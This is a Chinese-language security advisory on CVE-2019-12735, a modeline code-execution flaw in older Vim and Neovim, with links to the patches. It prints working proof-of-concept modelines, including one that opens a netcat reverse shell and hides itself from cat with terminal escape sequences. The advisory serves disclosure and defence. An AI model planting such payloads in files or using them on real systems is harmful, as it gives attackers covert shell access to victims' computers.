Vim 与 Neovim 曝出任意代码执行漏洞

发布者:信网处发布时间:2019-06-04浏览次数:1000

Vim Neovim 曝出任意代码执行漏洞

201964日此漏洞曝光,安全研究人员发现 VimNeovim中存在一个任意执行漏洞,允许黑客在用户打开恶意文本文件时控制计算机。漏洞影响 Vim 8.1.1365与 Neovim 0.3.6之前的所有版本

一、漏洞分析

漏洞编号:CVE-2019-12735

二、漏洞利用

该漏洞存在于编辑器的 modeline(模式行)功能,此功能允许用户在文本文件的开头或结尾设置窗口尺寸和其它自定义选项,它在一个被操作系统封锁的沙箱中运行,并且可用命令也被限制。

利用漏洞使用uname -a命令:

:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

一旦用户打开文件就自动启动反向 shell。为了隐藏攻击,文件将在打开时立即重写。此外,当使用 cat输出内容时,攻击还使用终端转义序列隐藏 modeline

\x1b[?7l\x1bSNothing here.\x1b:silent! w | call system(\'nohup nc 127.0.0.1 9999 -e /bin/sh &\') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails(\'set\\ fde=x\\ \\|\\ source\\!\\ \\%\') fdl=0: \x16\x1b[1G\x16\x1b[KNothing here."\x16\x1b[D \n

三、漏洞修复

目前补丁也已经释出:

 Vim patch 8.1.1365https://github.com/vim/vim/commit/5357552

 Neovim patchhttps://github.com/neovim/neovim/pull/10082